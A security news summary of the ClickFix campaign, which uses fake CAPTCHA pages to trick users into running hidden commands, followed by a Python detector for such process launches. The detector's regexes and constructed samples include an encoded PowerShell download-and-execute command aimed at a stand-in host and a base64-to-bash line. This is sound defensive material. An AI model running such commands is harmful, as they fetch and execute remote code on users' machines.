
Cybersecurity firm Guardio has uncovered a new campaign, ClickFix, that weaponizes fake CAPTCHA verification pages to trick users into executing malicious commands, marking a major evolution from 2024’s fake browser update scams.
Victims encounter CAPTCHA pages branded with Google reCAPTCHA or Cloudflare logos, but instead of solving a puzzle, they’re instructed to perform keyboard shortcuts (e.g., Windows+R → Ctrl+V → Enter) that run hidden PowerShell commands copied to the clipboard.
Initially focused on Windows, the attacks used heavily obfuscated PowerShell payloads to fetch and execute remote code, bypassing signature-based detection. The campaign has since expanded to macOS (instructing users to run Base64-encoded bash commands via Terminal) and Linux, making it a multi-platform threat.
Attackers host these malicious flows on Google Scripts, leveraging its trusted infrastructure to evade security filters. Infrastructure analysis shows organized operations with distinct attacker clusters; one group consistently uses .run and .press domains and clean PowerShell syntax, indicating automated toolkits.
By removing file downloads and using trusted brands, ClickFix increases user compliance while reducing detection risk, signaling a new wave of browser-based social engineering attacks targeting users across all major platforms.
The ClickFix campaign marks a significant evolution in browser-based social engineering, replacing obvious malware downloads with interactive, brand-impostor CAPTCHA prompts that exploit human trust and familiarity with routine actions. By leveraging trusted platforms like Google Scripts and expanding beyond Windows to macOS and Linux, attackers are broadening their reach while reducing their detection footprint. This shift highlights the critical need for user awareness training, behavioral detection systems, and strict browser security policies to counter increasingly deceptive multi-platform threats.
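As an added illustration of the behavioral detection mentioned above (not code from Guardio or the source article), the following Python triages process-creation events for the pattern the campaign relies on: PowerShell launched from the Run dialog with a hidden window or an encoded command that fetches and executes remote content, and Base64-decoded data piped into a shell on macOS or Linux. The event format, indicator names and alert threshold are assumptions, and the sample events are constructed.

```python
import base64
import re

PS = re.compile(r"\b(powershell|pwsh)(\.exe)?\b", re.I)
HIDDEN = re.compile(r"\s-w(indowstyle)?\s+hidden\b", re.I)
ENC = re.compile(r"\s-e(c|nc|ncodedcommand)?\s+(?P<b64>[A-Za-z0-9+/=]{16,})", re.I)
FETCH = r"(iwr|irm|invoke-webrequest|invoke-restmethod|downloadstring)"
EXEC = r"(iex|invoke-expression)"
FETCH_EXEC = re.compile(rf"\b{EXEC}\b.*\b{FETCH}\b|\b{FETCH}\b.*\b{EXEC}\b", re.I | re.S)
B64_TO_SHELL = re.compile(r"base64\s+(-d|--decode)\b[^|]*\|\s*(ba|z)?sh\b", re.I)

def decode_encoded_command(cmdline):  # UTF-16LE text behind -EncodedCommand, or None
    m = ENC.search(cmdline)
    try:
        return base64.b64decode(m["b64"], validate=True).decode("utf-16-le") if m else None
    except (ValueError, UnicodeDecodeError):
        return None

def triage(parent, cmdline):
    """Return the ClickFix-style indicators seen in one process-creation event."""
    reasons = []
    if PS.search(cmdline):
        decoded = decode_encoded_command(cmdline)
        checks = [  # Win+R launches are children of explorer.exe
            (parent.lower() == "explorer.exe", "powershell started by explorer.exe"),
            (HIDDEN.search(cmdline), "hidden window"),
            (decoded is not None, "encoded command"),
            (FETCH_EXEC.search(decoded or cmdline), "fetch and execute remote content"),
        ]
        reasons = [why for hit, why in checks if hit]
    if B64_TO_SHELL.search(cmdline):
        reasons.append("base64 output piped to a shell")
    return reasons

def is_alert(reasons):  # a single PowerShell indicator is common in normal use
    return len(reasons) >= 2 or "base64 output piped to a shell" in reasons

def _b64(text, encoding):  # builds the constructed samples below
    return base64.b64encode(text.encode(encoding)).decode()

# Constructed sample events (parent image, command line); not real telemetry.
SAMPLES = [
    ("explorer.exe", "powershell -w hidden -enc " + _b64("iex (iwr 'https://example.invalid/a')", "utf-16-le")),
    ("explorer.exe", "powershell.exe"),
    ("Terminal", "echo " + _b64("echo constructed-sample", "utf-8") + " | base64 -d | bash"),
    ("code.exe", "powershell -NoProfile -File build.ps1"),
]
for parent, cmd in SAMPLES:
    print(is_alert(triage(parent, cmd)), triage(parent, cmd))
```

Only the first and third constructed events raise an alert; a plain interactive PowerShell launch from the Run dialog carries one indicator and stays below the threshold.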
Source Link — https://gbhackers.com/fake-captcha-used-in-new-clickfix-attack/